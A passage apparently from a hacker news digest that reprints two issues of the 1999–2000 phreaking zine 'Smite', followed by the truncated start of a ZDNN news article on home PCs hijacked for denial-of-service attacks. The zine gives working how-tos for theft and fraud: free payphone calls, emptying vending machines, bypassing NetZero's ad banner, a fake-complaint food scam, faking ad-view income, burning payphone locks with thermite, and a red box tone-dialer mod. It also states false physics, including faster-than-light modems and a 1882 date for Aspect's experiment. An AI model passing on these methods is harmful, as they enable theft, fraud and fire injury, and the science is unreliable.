      TONE DIALER. ARE YOU DOOMED TO LIVE LIFE A LAME NEWBIE THAT CAN'T MAKE
      FREE CALLS? NO. I PRESENT TO YOU THE
      (VERY) POOR MAN'S TONE DIALER. 
      
      PARTS:                      QUANTITY:
      
      *PHONE                          1
      *9V BATTERY CLIP                2
      *9V BATTERY                     2
      *DPST SWITCH                    1
      
      
      ASSEMBLY:
      
      YOU PROBABLY ALREADY KNOW BUT I'LL MAKE A 1337 LITTLE ASCII SCHEMATIC 
      FOR YOU ANYWAY.
      
      
      
      
      
                                           (SWITCH)
                                            ___#___
                                ___________!       !__________
                                | _________!-------!___      | 
                  _______ (RED) | |                   |      |
                 |       |------| |-|   ______________|      |
        MODULAR  |       |          |   |                    |
         PLUG -->|       |-------|  |   |   - 9V +   - 9V +  |   
        (FEMALE) |_______|       |  |___|___|    |___|    |__|__  
                                 |
                                 |
                           [TO MAIN BOARD]
      
      YUP, THAT'S RIGHT, YOU GUESSED IT, ALL IT DOES IS GIVE THE PHONE POWER
      WHILE IT IS NOT PLUGGED IN. SO NOW EVEN POOR FOLKS CAN MAKE FREE CALLS
      FROM COCOTS. 
      
      
      
      ***************************************
      *  GETTING FREE COKES -- BY KORNFEID  *
      ***************************************
      
      
      THIS METHOD OF OBTAINING FREE COKES IS KNOWN AS "JACKPOTING" AND WAS 
      INVENTED BY MYSELF. OK SO YOU COME HOME FROM A HARD DAY OF PHREAKING AND 
      YOU'RE THIRSTY. YOU OPEN YOUR CARDED FRIDGE AND ALL YOU SEE ON THE 
      SHELVES-A JAR OF MAYONNAISE AND SOME MOLDY BREAD. THEN YOU REMEMBER YOU 
      KNOW HOW TO OBTAIN LIQUID SUSTENANCE FOR FREE. YOU HEAD DOWN TO THE LOCAL 
      7-ELEVEN AND BUY A THING OF SALT FOR $1.19-OR CHEAPER IF THE SECURITY IS 
      LAX (A GIVEN). STEP OUTSIDE AND PROCEED TO MAKE SURE NO ONE IS LOOKING 
      AND POUR THE SALT INTO THE COIN SLOT-AFTER YOU HAVE GOTTEN A BAG 
      READY-AND ENJOY THE RAIN OF COKES. THIS WORKS BY PRESSING THE COIN 
      COUNTER THINGIES ALL AT ONCE WHICH CAUSES THE MACHINE TO DUMP ALL ITS 
      COKES-I'VE NEVER TRIED THIS WITH CANDY MACHINES BUT IT MIGHT WORK. I HAVE 
      HEARD OF A SIMILAR METHOD WHICH USES SALT WATER INSTEAD BUT I HAVE NEVER 
      TRIED THIS ONE. ANOTHER METHOD-WHICH APPEARED IN PHRACK MAGAZINE-INVOLVES 
      PUTTING TAPE ON A DOLLAR AND YANKING IT BACK OUT ONCE IT HAD BEEN 
      VALIDATED. TAKE THE DOLLAR AND PUT IT FLAT ON A TABLE LIKE YOU WERE 
      PUTTING IT IN A MACHINE WITH GEORGE'S HEAD FACING LEFT (THAT'S <-- FOR 
      ALL YOU YOUNGINS) AND PUT STRIPS OF PACKING TAPE ON THE EDGES AS SHOWN IN 
      THE DIAGRAM I PLAGIARIZED FROM PHRACK. (SEE BELOW) WHEN YOU ARE DONE WITH 
      THIS YOU ARE READY TO GET SOME FREE COKES. JUST STICK THE WHOLE THING IN 
      THE MACHINE DOLLAR FIRST (DUH) AND ONCE IT STOPS IN THERE MAKE YOUR 
      SELECTION. THEN YANK THE WHOLE THING OUT (SLOWLY) AND YOU GET YOUR MONEY 
      BACK. THE PROBLEM WITH THIS METHOD IS THAT IT ONLY WORKS WITH THE OLDER 
      TYPE OF MACHINES. 

      DIAGRAM:
      
      __________________________________________________
      |****************************|*******************|<--
      |****************************|1       /@\       1|  |  TAPE ONLY
      |************TAPE************|   00  /@@@\  88   |  ]--ALONG THE
      |****************************|   00  \@@@/  88   |  |  SIDES
      |****************************|1       \@/       1|  |
      |****************************|*******************|<--
      --------------------------------------------------
                           
          ^----DOUBLE THE TAPE ON ITSELF HERE
               SO IT WON'T STICK TO ANYTHING
      
      YOU JUST PUT CLEAR PACKING TAPE ON THE EDGES OF THE DOLLAR AND TRAIL IT
      OFF ABOUT 15 INCHES SO THAT YOU HAVE ENOUGH FOR THE VARIOUS MACHINES. 
      
      
      
      
      
      
      ***************************************************
      *  LEET LIL 'SPLOITS: FREE NET ACCESS -- BY EGGO  *
      ***************************************************
      
      SO YOU HAVE PROBABLY HEARD ABOUT NET ZERO, THE COMPANY THAT WILL GIVE YOU 
      FREE INTERNET ACCESS JUST FOR HAVING AN AD BANNER ON YOUR DESKTOP. (NO 
      THAT'S NOT THE END OF THIS FILE) THIS BANNER REALLY IRRITATES ME, YOU CAN'T 
      MINIMIZE IT, (ITS PRETTY FUCKING BIG) AND IF YOU USE A PROG SUCH AS 
      "HACKIT4.EXE" IT GETS ALL HUFFY AND BOOTS YOU OFF. SO FROM THE MINUTE I 
      GOT IT, I TRIED TO FUCK WITH IT (NOT LIKE THAT!). IT ONLY TOOK ME ABOUT A 
      DAY TO FIGURE OUT THAT THE BANNER IS STARTED AND CONTROLLED BY A FILE 
      CALLED "NET.DLL" IN THE FOLDER CALLED "BIN", MY FIRST THOUGHT WAS TO ALTER 
      THE FILE SO THE BANNER WOULDN'T SHOW UP. I SEARCHED FOR A WAY TO SO MUCH 
      AS LOOK AT THE FILE, TO NO AVAIL (I FEEL VERY NON-LEET). SO IN A 
      LAST-DITCH EFFORT TO RID MYSELF OF THIS VILE BANNER THAT HAUNTED MY SOUL, 
      I RENAMED IT TO "NET2.DLL" I RAN THE NETZERO PROGRAM, ENTERED MY PASSWORD, 
      AND LO AND BEHOLD--IT WORKED! IT TURNS OUT THE FILE DOES NOTHING BUT RUN 
      THE AD BANNER AND THE "CREATE NEW ACCOUNT" OPTION. SO ALL YOU HAVE TO DO 
      IS RENAME ONE LITTLE FILE (DON'T DELETE IT, THEY MAY DECIDE TO CANCEL YOUR 
      ACCOUNT AND YOU'LL NEED IT TO MAKE A NEW ONE) AND YOU HAVE FREE UNLIMITED 
      ACCESS TO THE INTERNET (READ: PORN :) ). NOTE: I MADE THE MISTAKE OF 
      TELLING A FEW PEOPLE HOW TO DO THIS, AND WORD GOT AROUND TO THE GOOD OL' 
      FOLKS AT NETZERO. SO THEY CORRECTED IT AND THE NEW VERSIONS WON'T RUN 
      WITHOUT NET.DLL IN PLACE. ANSWER: USE THE OLD VERSION. 
      
      
      **************************************************
      *       NEWS: FREE SPEECH? BAH! -- BY EGGO       *
      **************************************************
      
      
      WE ALL HEARD ABOUT THE RECENT TRAGEDY AT COLUMBINE HIGH SCHOOL, BUT YOU 
      MAY NOT HAVE HEARD OF THE WAVE OF PARANOIA THAT HAS PASSED IN ITS WAKE. 
      IN EARLY SEPTEMBER, A COUPLE OF STUDENTS AT AN OHIO HIGH SCHOOL WERE 
      ARRESTED FOR SAYING WHAT THEY *HYPOTHETICALLY* WOULD HAVE DONE IF THEY 
      WERE IN THE SITUATION THAT FACED THE TWO STUDENTS AT COLUMBINE HIGH. THEY 
      HAVE BEEN HELD WITHOUT BAIL FOR MONTHS (AT THE TIME OF THIS WRITING) AND 
      ARE GOING TO TRIAL SOON. NOW THIS STRUCK ME AS STRANGE, SINCE WHEN WAS IT 
      ILLEGAL TO TALK ABOUT *ANYTHING*? (SLANDER AND LIBEL NOTWITHSTANDING) AS 
      FAR AS I HAVE HEARD, THEY DID NOT THREATEN THE LIFE OF THE PRESIDENT, 
      (WHICH IS ILLEGAL) BUT THEY MERELY SAID A FEW THINGS THEY WOULD HAVE DONE 
      DIFFERENTLY. HAS THIS COUNTRY FORGOTTEN THE FIRST AMENDMENT OF THE 
      CONSTITUTION? (BTW WHY IS IT CHARLIE HESTON CAN CITE THE SECOND AMENDMENT 
      AND IT WILL HOLD WATER, BUT THE FIRST IS BEING TRAMPLED INTO THE DUST 
      EVERYWHERE WE LOOK?) I (AND ANYONE ELSE FOR THAT MATTER) CAN SAY WHATEVER 
      THE FUCK I WANT, WHENEVER THE FUCK I WANT, OR AT LEAST I THOUGHT SO... 
      
      
      
      **************************************************
      *                    CLOSING                     *
      **************************************************
      WELL THAT CONCLUDES THE FIRST EDITION OF SMITE. I WILL BE RELEASING IT ON 
      A MONTHLY BASIS, SO IF YOU WANT TO SUBMIT AN ARTICLE, DO SO BEFORE JANUARY 
      31 SO I CAN GET IT INTO THE NEXT ISSUE. ALL ARTICLE SUBMISSIONS SHOULD BE 
      DIRECTED TO: EGGOTWRP@HOTMAIL.COM

      
      
      ---------------------------------------------------
      I FREQUENT ALT.PHREAKING ON USENET SO LOOK FOR MY WISE <> WORDS THERE. BUT 
      READ THE FAQ FIRST!! IT CAN BE FOUND AT: 
      http://members.tripod.com/SeusslyOne WANT TO TELL ME HOW LEET I AM? 
      GENERALLY KISS MY ASS? CALL ME A DUMB FUCK? I CAN BE REACHED AT 
      EGGOTWRP@HOTMAIL.COM I RESPOND TO (MOST) MAIL, SO IF YOU WANT TO ASK ME 
      SOMETHING THAT IS YOUR BEST BET. COPYRIGHT (C) 1999 BY EGGO
      
      
      -=-=-=-=-
      
      SMITE ISSUE #2
      ~~~~~~~~~~~~~~
      
                   _/_/_/   _/      _/   _/_/_/   _/_/_/_/_/   _/_/_/_/
                _/         _/_/  _/_/     _/         _/       _/
                 _/_/     _/  _/  _/     _/         _/       _/_/_/
                    _/   _/      _/     _/         _/       _/
             _/_/_/     _/      _/   _/_/_/       _/       _/_/_/_/
      
      
                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                   $$$$$$$$$$$$$$$$$ISSUE TWO$$$$$$$$$$$$$$$
                   $$$$$$$$$$$JANUARY/FEBRUARY 2000$$$$$$$$$
                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      
      
      CONTENTS:
      
      -INTRODUCTION
      -UPDATES
      -THE THEORETICAL PHYSICIST'S HOUR--EGGO
      -CHEAPSKATE'S CORNER--KORNFEID
      -SHOP CLASS--EGGO
      -GREAT QUOTES--VARIOUS AUTHORS
      -CONCLUSION
      
      
      
      INTRODUCTION:
      
      WELCOME TO THE SECOND ISSUE OF SMITE. I AM NOT IN SUCH LIGHT SPIRITS THIS 
      ISSUE. MY FRIEND AND CO-WRITER OF THIS ZINE, JAMES AVERY, AKA KORNFEID, IS 
      DEAD. HE DIED ON JANUARY 1ST, KILLED BY SOME DRUNKEN REDNECK, WHILE ON HIS 
      WAY TO GET FOOD AFTER A PARTY AT OUR DORM. JAMES IS THE ONE WHO GOT ME 
      INTERESTED IN PHREAKING, AND SHOWED ME A LOT OF WHAT I KNOW ABOUT IT. I'VE 
      DECIDED TO CONTINUE WITH THE ZINE, PUBLISH THE LAST OF HIS "CHEAPSKATE'S 
      CORNER" ARTICLES, THEN CONTINUE THEM MYSELF. THIS ZINE WAS HIS IDEA IN THE 
      FIRST PLACE, SO I DEDICATE THIS, AND ALL SUBSEQUENT ISSUES TO HIM. THIS IS 
      FOR YOU JAMES. 
      
      
      
      *******************************************************
      ************************UPDATES************************
      *******************************************************
      
      --YOU CAN IN FACT HACK THE NEW VERSION OF NETZERO, YOU JUST HAVE TO CHANGE 
      THE NAME OF NET.DLL *AFTER* YOU OPEN THE PROGRAM, BUT BEFORE YOU LOG ON. 
      YOU HAVE TO CHANGE IT BACK TO SIGN ON AGAIN, BUT HEY, IT'S FREE, SHUT UP. 
      
      *******************************************************
      *      THEORETICAL PHYSICIST'S HOUR -- BY: EGGO       *
      *                                                     *
      *  --BELL'S THEOREM, AND FASTER THAN LIGHT MODEMS--   *
      *******************************************************
      
      I RECENTLY SAW A VERY THOUGHT-PROVOKING SHOW ON THE LEARNING CHANNEL. IT 
      WAS ALL ABOUT QUANTUM MECHANICS AND THE LIKE, ONE PARTICULAR SEGMENT, 
      COVERING BELL'S THEOREM, GOT ME TO THINKING. HERE IS MY IDEA:

      FIRST, AN EXPLANATION OF THE CONCEPT. I'M NOT GOING TO GET INTO THE ACTUAL 
      MATHEMATICS OF BELL'S THEOREM, BUT RATHER THE POSSIBLE APPLICATIONS. FOR 
      STARTERS, IMAGINE A PAIR OF PHOTONS, THEY ARE COMPLETE OPPOSITES. 
      I.E. PHOTON "a" HAS A PARTICULAR SPIN, CHARGE, AND ALL THE OTHER ATTRIBUTES 
      THAT A PHOTON CAN HAVE. PHOTON "b" HAS ALL THE SAME TRAITS, ONLY IN 
      REVERSE, REVERSE SPIN, OPPOSITE CHARGE, AND EVERYTHING ELSE. IF YOU WERE TO 
      CHANGE ANY ONE OF THOSE ATTRIBUTES, THE SAME THING WOULD HAPPEN TO THE 
      OTHER, INSTANTLY. REGARDLESS OF DISTANCE.

      SO IF I HAD A PAIR OF THESE PHOTONS (ACTUALLY IT CAN BE ANY PARTICLE), EACH 
      IN A CONTAINER, AND SENT ONE TO THE OTHER SIDE OF THE WORLD, (OR ANYWHERE 
      ELSE FOR THAT MATTER) AND CHANGED THE POLARITY OF PHOTON "a", THE 
      POLARITY OF PHOTON "b" WOULD ALSO CHANGE. (THIS HAS BEEN DONE ALREADY, BY 
      A FRENCH PHYSICIST NAMED ALAIN ASPECT IN 1882.) 

      RIGHT ABOUT HERE I STARTED TO PONDER THE PRACTICAL USES FOR A DEVICE BASED 
      ON THIS CONCEPT. IF YOU WERE TO BUILD A MODEM-LIKE DEVICE, BUT INSTEAD OF 
      A PHONE LINE, IT IS CONNECTED TO SOMETHING TO CHANGE THE POLARITY OF THE 
      PHOTON IN YOUR BRAND NEW "PARTICLE COMMUNICATIONS DEVICE", (THE COMPUTER 
      YOU ARE TRYING TO COMMUNICATE WITH HAS THE COUNTERPART OF YOUR PHOTON, IN 
      ITS "PCD") AND MESSAGES ARE SENT, OVER INSANE DISTANCES, INSTANTLY. 

      ONE OF THE MAJOR HURDLES TO OVERCOME BEFORE WE CAN SEND PEOPLE TO MARS, IS 
      THE FACT THAT IT TAKES RADIO WAVES FIFTEEN MINUTES TO GET THERE. WITH A 
      DEVICE LIKE THIS, THAT WAITING TIME WOULD SHRINK DOWN TO ZERO. IF 
      MAJOR INTERNET BACKBONES USED "PCD'S" INSTEAD OF CABLES, THE SPEED OF THE 
      INTERNET WOULD JUMP EXPONENTIALLY. IF THESE BECAME WIDELY USED, THE ONLY 
      THING THAT WOULD SLOW THE COMMUNICATIONS PROCESS WOULD BE THE PEOPLE AT 
      EITHER END.
      
      
      
      ********************************************************
      *         CHEAPSKATE'S CORNER  --  KORNFEID            *
      *                                                      *
      *                LIE, CHEAT AND STEAL                  *
      ********************************************************
      
      WELL, YOU JUST THINK YOU'RE A BADASS NOW BECAUSE YOU CAN GET FREE COKES 
      HUH? WELL WAIT 'TILL YOU SEE WHAT 'OL KORNFEID HAS IN STORE FOR YOU THIS 
      MONTH.

      HOW TO SURVIVE COLLEGE ON LESS THAN TWO ALTERIAN DOLLARS A DAY:

      1) LIE

      EXAMPLE: YOU ARE HUNGRY, MOST PEOPLE WOULD GO TO McDONALDS 
      AND BUY A BURGER. NOT YOU! YOU SIMPLY WALK TO THE NEAREST PAYPHONE, MAKE A 
      CALL TO THE MICKEY D'S AND SAY THE FOLLOWING (HINT: SOUND PISSED): 
      "GODDAMNIT! I JUST CAME THROUGH YOUR FUCKING DRIVE-THRU AND YOU FUCKED MY 
      ORDER ALL UP!!" "OK SIR, IF YOU'LL JUST GIVE ME YOUR NAME, I'LL GIVE YOU 
      STORE CREDIT." "I DON'T WANT NO FUCKING STORE CREDIT. I WANT MY FUCKING 
      BURGER!" "ALRIGHT SIR, IF YOU CAN COME BACK TO THE STORE, WE WILL CORRECT 
      YOUR ORDER." "FINE! I'LL BE THERE IN TEN MINUTES, MY NAME IS JOE BLOW, AND 
      YOU HAD BETTER HAVE MY ORDER REDAY WHEN I GET THERE." (SOMETIMES)"ALRIGHT 
      SIR WHAT WAS MISSING FROM YOUR ORDER?" "TWO BURGERS AND SOME FRIES."

      YOU GET TO THE STORE, THEY WILL ASK TO SEE YOUR RECEIPT, THIS IS WHERE THE 
      CLEVER PART COMES IN, YOU GIVE THEM AN OLD RECEIPT THAT YOU HAVE SPILLED 
      KETCHUP ON, COVERING THE DATE. (MAKE SURE THAT THE ORDER ON IT 
      RESEMBLES WHAT YOU "ORDERED")

      THEY WILL USUALY GIVE YOU THE FOOD WITHOUT QUESTION, BUT IF THEY SAY 
      ANYTHING, JUST KEEP BITCHING ABOUT YOUR HUNGRY KID (OR SOMTHING ALONG 
      THOSE LINES). AND MAKE SURE TO HOLD UP THE LINE, THEY ARE MORE 
      LIKELY TO SUBMIT TO YOUR PLOY IF THEY ARE UNDER STRESS FROM OTHER 
      CUSTUMORS TOO.

      2) CHEAT

      SO MAYBE YOU HAVE A JOB, MAYBE YOU DON'T. IT MAKES NO 
      DIFFERENCE REALY, YOU'RE STILL BROKE ALL THE TIME. SO YOU NEED TO GET 
      MONEY FROM EVERYONE WHO WILL GIVE IT TO YOU. EXAMPLE: YOU HAVE PROBABLY 
      HEARD OF THE COMPANIES LIKE ALLADVANTAGE.COM THAT WILL PAY YOU FOR 
      DISPLAYING A BANNER ON YOUR DESKTOP, SIGN UP FOR AS MANY OF THESE AS YOU 
      CAN FIND.

      NOW, YOU NEED ANOTHER VIDEO CARD (YOU SHOULDN'T NEED A MONITOR ATTACHED TO 
      IT, BUT I HAD AN EXTRA SO I HOOKED IT UP. NOW YOU MAY NOT KNOW THIS, BUT 
      WINDOWS 98 HAS MULTI-MONITOR SUPPORT, SO YOU SET THE BANNERS UP TO 
      RUN ON YOUR EXTRA MONITOR, ALONG WITH A BROWSER WINDOW. NOW ALL YOU NEED 
      TO DO IS WRITE A MACRO (OR USE A PROGRAM, THEY ARE WIDELY AVAILABLE) THAT 
      WILL MOVE THE MOUSE AND CHANGE THE URL PERIODICLY, AND YOU HAVE SOMTHING 
      THAT YOU CAN RUN 24-7, AND "EARN" AS MUCH AS $120 A MONTH! (BETWEEN ME AND 
      EGGO, WE MAKE ABOUT $250 PER MONTH) NEEDLESS TO SAY, YOU SHOULD HAVE THE 
      MONEY SENT TO A P.O. BOX, SO YOU CAN CHANGE IT IF THE COMPANY CATCHES ON 
      (SOMETIMES THEY DO).

      3) STEAL

      YOU CAN SUPPLEMENT YOUR INCOME BY FLAT-OUT STEALING. I DON'T 
      LIKE DOING THIS BECAUSE IT DOESN'T TAKE ANY TALENT. EXAMPLE: MAKE SOME 
      THERMITE. STEAL A ROLL OF MAGNISIUM RIBBON FROM YOUR LOCAL CHEMISTRY 
      CLASS. MAKE LITTLE PACKETS OF THERMITE THAT ARE SMALL ENOUGH TO FIT IN THE 
      KEYHOLE OF A PAYPHONE, STICK A PACKET INTO EACH OF THE KEYHOLES THAT ARE 
      USED TO OPEN THE CASH BOX (THERE ARE THREE) PUT A TWO-INCH SLICE OF 
      MAGNISIUM IN AFTER THE THERMITE, SO THAT IT STILL STICKS OUT. LIGHT THE 
      RIBBON YOU DON'T REALY NEED A BLOWTORCH, YOU CAN LIGHT IT WITH A REGULAR 
      BUTANE LIGHTER, IT JUST TAKES LONGER. NOW GET THE FUCK BACK! THIS STUFF 
      BURNS *VERY* BRIGHTLY, SO IF THERE IS ANYONE AROUND, DON'T DO IT.

      
      
      
      ********************************************************
      *                 SHOP CLASS -- EGGO                   *
      *                                                      *
      *      THE NOT-QUITE-AS-POOR MAN'S TONE DIALER         *
      ********************************************************
      
      
      SO YOU AREN'T QUITE AS POOR AS LAST MONTH, YOU EITHER: 1) KNOCKED OVER A 
      LIQUOR STORE 2) YOU ELECTRONICALLY TRANSFERRED MILLIONS OF DOLLARS INTO YOUR 
      SWISS BANK ACCOUNT. WHICH EVER IT WAS, YOU HAVE SOME MONEY NOW, SO LET'S 
      BUILD SOMETHING.

      FIRST THINGS FIRST, GO GET A RADIO SHACK TONE DIALER (THE CHEAP ONE, $16. 
      YOU'RE STILL POOR REMEMBER?). TAKE IT HOME AND CRACK IT OPEN. BE SURE TO 
      BURN THE BOX AND ALL THE DOCS, (BECAUSE YOU'RE SO 1337, THE FEDS ARE 
      GOING THROUGH YOUR TRASH) AND REPLACE THE CRYSTAL WITH YOUR 'LEET NEW 
      REDBOX XTAL. NOW, I KNOW WHAT YOU'RE SAYING, "BUT EGGO, I CAN ONLY MAKE 
      NICKLE TONES--BECAUSE I'M POOR." AND MY RESPONSE IS,"SHUT UP, I'M GETTING 
      TO THAT PART!"

      WHAT YOU NEED TO DO NOW, IS PUT A MOMENTARY TACT SWITCH (NORMALY OPEN) 
      ACROSS PINS ONE AND SIXTEEN. RUN THE SWITCH TO SOMEWHERE ON THE CASE, 
      CLOSE IT UP, AND YOU'RE READY TO GO.

      TURN ON THE DIALER, PUNCH IN FIVE *'S AND PRESS YOUR NEW BUTTON. WAIT 
      THREE SECONDS, AND THERE YOU GO, A QUARTER TONE! APPARENTLY THE CHIP 
      STORES THE LAST 31 NUMBERS PRESSED SINCE YOU TURNED IT ON. YOU HAVE 
      TO PUT IN THE *'S EVERY TIME, BUT HEY, YOU'RE POOR. 

      OTHER NOTES: IF YOU PUT THE SWITCH ACROSS PINS 16 AND 8, YOU WILL GET A 
      TONE BEFORE IT PLAYS BACK THE QUARTER TONE, I HAVE NO IDEA WHAT FREQ, OR 
      WHY IT'S THERE, BUT IT IS. I FOUND ALL THIS STUFF OUT WHILE TRYING 
      TO FIND DTMF A-D, THIS CHIP CAN'T MAKE THEM.
      
      
      ********************************************************
      *                    GREAT QUOTES                      *
      *                                                      *
      *       VARIOUS QUOTES THAT I THOUGHT WERE GOOD        *
      ********************************************************
      
      FROM MTV'S CHOOSE OR LOSE PUBLIC FORUM (WHATEVER YOU MAY SAY ABOUT MTV, 
      THEY DID PUBLISH THESE, REGARDLESS OF THE VIEWS EXPRESSED IN THEM):

      

      DON'T WANT MY MTV

      I'm a high school student. I do not possess the 
      right to wear a shirt that has an anti-swastika symbol. I do not possess 
      the right to write about faculty and administrative decisions in a 
      negative light. I do not possess the right to privacy within my locker. I 
      cannot distribute a "zine" or alternative newspaper in my school for fear 
      of expulsion.

      I'm sick of being censored, and so I dare you, MTV, to censor me based on 
      this following comment: MTV is nothing but a cheapening of art. It takes 
      music and turns it into commercials. It finds what sells and then airs it, 
      ultimately in order to sell that oh-so-precious product, the viewer.

      Choose or lose? It's ironic that MTV should start a campaign like this. It 
      almost implies that MTV is a socially conscious network. But then I glance 
      at the screen, and swoosh-- just do it.

      Or maybe I see Brittany Spears televised like an artificial piece of 
      meat-- am I suppose to crave this girl? She is my age. We've all got 
      hormones, we've all got innocence, they're gonna be lost sometime, right 
      MTV?

      Then there's Kid Rock. A real role-model with his degradation of women and 
      his promotion of a lifestyle of recklessness, apathy, selfishness. Take 
      what you can. But he put out a slow song. Should I feel bad for him, he 
      almost seems like he's been victimized? Hah. Sex sells, especially 
      cheap sex, to the desperate adolescent in us all, right MTV?

      Fred from Limp Bizkit, now that is a cool guy, nice red Yankees hat there. 
      Anyone ever mention Fred's ploy to get airtime on major radio stations? Or 
      how 'bout his inciting the riot at Woodstock and then denying 
      responsibility. He's a cool cat though, it's alright. Violence sells 
      to angst-ridden teens, right MTV?

      Pop-punk, swing, and ska, go ahead, rape the subcultures. Money is money, 
      profit is profit, right MTV?

      Choose or Lose? Choose who? Democrats, Republicans. Lose who? 
      Everyone looking for a choice.

      Who cares. Isn't that what you want in the end? Me not to care about 
      anything but Brittany's breast size and Travis' latest tattoo. And where 
      in the world is Carson Daly now? Coming up, after this...swoosh, just do 
      it.
      
      -dhcgrrl, FL
      
      
      
      People don't care about politics because we're living in an age of 
      prosperity. It seems each day I tune into CNN to learn of another Wall St. 
      record. Meanwhile, globalization and exploitation is proliferating, under 
      the booming surface. As long as we see green (cash of course, the 
      corporations are sawing through the real greens of South America), 
      everything is alright. But it's not. American culture is dead. All we've 
      got are some glamorous Barbie dolls and Ken with his clique, singing about 
      love and lost love. We're rotting away in this plastic life. The media, 
      the corporations, the candidates, they'd prefer to keep us drugged, 
      distracted from the real issues that are affecting and will affect real 
      lives. I don't want to hear about a Christian's moral crusade or Bush's 
      drug history. I don't care about the sex life of anyone but me. I don't 
      care about the slight differences in health-care plans. I care about 
      sanctions that kill millions of Iraqi children, or U.S concrete bombs that 
      ruin their homes. I care about money in politics. I care about politicians 
      who have mastered the deceptive art of being politicians. I care about 
      health care. I care about the inner-cities falling apart and the homeless 
      too scared to enter homeless shelters (and so we apply the handcuffs). I 
      care about the mentally-ill that roam our cities. I care about 
      multinational corporations treating the environment like an imperial 
      venture. I care about that seven year-old who made your Nikes. I care 
      about that potato that isn't quite as natural as it looks. I care about 
      the false sense of NATO's purpose. I care about a media that is supposed 
      to keep me informed but is too distracted by my buying power. I'm an 
      adolescent male, I like Vans shoes and listen to punk rock. I drink root 
      beer, I like its taste. Go ahead and buy me, NBC. Try to take my soul, 
      Fox. I'll give you 120 minutes of my time MTV, come and get me... try.

      -bored in the USA, DC 
      
      
      
      SIG LINE HALL OF FAME:
      
      "Windows is a 32bit graphical shell which links to a 16 bit patch to a 
      8bit operating system made to run on a 4 bit microprocessor by a 2 bit 
      company that can't stand one bit of competition." --Usurp, via usenet
      
      
      
      
      ********************************************************
      *                  CONCLUSION--EGGO                    *
      ********************************************************
      WELL, THIS EDITION WAS MUCH HARDER THAN THE FIRST, BUT I THINK IT TURNED 
      OUT ALL RIGHT. I STILL NEED ARTICLES, SO IF YOU HAVE SOMETHING TO EXPRESS 
      (UPL TURNED DOWN YOUR ARTICLE?--SEND IT MY WAY), SEND IT TO: 
      EGGOTWRP@HOTMAIL.COM

      
      
      ---------------------------------------------------
      I FREQUENT ALT.PHREAKING ON USENET SO LOOK FOR MY WISE [[chuckle]] WORDS 
      THERE. BUT READ THE FAQ FIRST!! IT CAN BE FOUND AT: 
      http://members.tripod.com/SeusslyOne WANT TO TELL ME HOW LEET I AM? 
      GENERALLY KISS MY ASS? CALL ME A DUMB FUCK? I CAN BE REACHED AT 
      EGGOTWRP@HOTMAIL.COM I RESPOND TO (MOST) MAIL, SO IF YOU WANT TO ASK ME 
      SOMETHING THAT IS YOUR BEST BET.

      COPYRIGHT (C) 2000 BY EGGO
      
      
      
      phew!, how was that for retro eh? reminded me of p-80 systems... - Ed
      best of luck and all power to em I say.
      
      
      
      @HWA
      
      
09.0  Has your PC been Hi-Jacked??
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by Twstdpair
      via MSNBC/ZDNN
      http://www.msnbc.com/news/371497.asp?cp1=1#BODY
      
      
      Has your PC been hijacked?
      If you subscribe to cable modem or DSL service, you're at risk
                                                             By Robert Lemos
                                                             ZDNN

      Feb. 17 -- It's 3 a.m. Do you know who's on your computer? Security experts
      warn that network intruders -- once only a boogeyman for large corporations
      and government agencies -- are becoming an increasing threat to home users,
      especially those wired to the Internet via new broadband connections such
      as cable modem and DSL.
      
      "What should have been the news is that there were hundreds and thousands 
       of computers taken over by the attackers, and that the owners not only 
       didn't know that they got broken into and taken over, but were not 
       monitoring their systems."
       
       - EUGENE SPAFFORD
         Purdue University computer
         science professor 
         
         
            "HOME USERS don't have the right security tools nor
     the understanding about why they need them," said Eugene
     Spafford, computer science professor and security expert at
     Purdue University. "They are much more likely to be prone
     to attack, or their machines used in distributed, coordinated
     attacks."
            Last week, denial-of-service attacks downed, or
     slowed to a crawl, eight major Internet sites -- Yahoo!,
     Amazon, Microsoft's MSN.com, eBay, E*Trade,
     Buy.com, Time Warner's CNN.com and ZDNet. 
            
            "Yet that should not have been the major story," said
     Spafford. "What should have been the news is that there
     were hundreds and thousands of computers taken over by
     the attackers, and that the owners not only didn't know that
     they got broken into and taken over, but were not
     monitoring their systems."
            
     MIXTER: USERS ARE HOPELESS VICTIMS
     
     
            With the advent of always-on, high-speed Internet
     connections, home computers with little if any 
     security are quickly becoming the No. 1 target for online
     vandals to use as a staging ground to shoot for more
     lucrative marks. 
     
     "Most broadband users are hopeless victims," said the
     German white-hat hacker known as Mixter, during a Tuesday
     interview over Internet relay chat.

     "Especially, when they're running Windows and have no good
     technical knowledge."
                         
     Mixter created a denial-of-service program, known as the
     Tribe Flood Network, which many believe was the tool of
     choice for the Web attackers last week. The attackers 
     first had to compromise computers and seed each one with
     the program weeks or months before the attack. 
     
            This week, a computer believed to have been used in
     last week's attacks on Yahoo! and other major Web sites
     was reportedly seized by federal agents in Hillsboro, Ore.
     The PC's owner allegedly had no knowledge that the
     computer was being used as a zombie to stage attacks. 
             
                
     THE CASE OF CHRISTIAN CRUMLISH
     
            For most users, installing a personal firewall can stop
     most such illicit use. Just ask Christian Crumlish of the
     importance of a good firewall. 
            Spooked by last week's attacks, the Waterside
     Productions literary agent downloaded Zone Labs Inc.'s
     free firewall, ZoneAlarm 2.0, and installed the electronic
     gate onto his DSL-connected PC. Other personal firewall
     products include BlackICE Defender and Norton Internet
     Security 2000. 
     
            "My system had slowed at seemingly random times in
     the past," said Crumlish. "But I never really thought I would
     find anything."

     Against expectations, Crumlish found three programs that, 
     together, opened up his PC for use by cyber vandals. The
     programs -- run.exe, msr.exe.exe and kerrne1.exe -- were the
     pieces to a backdoor app known as SubSeven. 
     
            "Whoever installed the programs has come back
     knocking at the trapdoor he left behind," Crumlish said. "I
     have detected three or four attempts to get into my system
     since I installed ZoneAlarm," said Crumlish, who added that
     without the urging of a friend, he would never have thought to
     put the firewall on his system. 
     
            "Broadband providers are not telling their customers
     about the threats that they have to worry about," he said. In
     fact, more than 400,000 users have taken matters into their
     own hands and downloaded copies of ZoneAlarm since the
     attacks last week. Such incidences are quickly convincing
     broadband companies to change their tune. 
            
     FLASHCOM NIXES USER'S FIREWALL
     
            One subscriber to broadband Internet service provider
     Flashcom Communications Inc. complained to ZDNet
     News that the company would not let him install a firewall.
      
      "They said they would not support a firewall, and if I
     installed one, they would disconnect me from the system,"
     said Jann Linder, a Silicon Valley Web programmer. 

            Flashcom denied that it would prohibit any subscriber
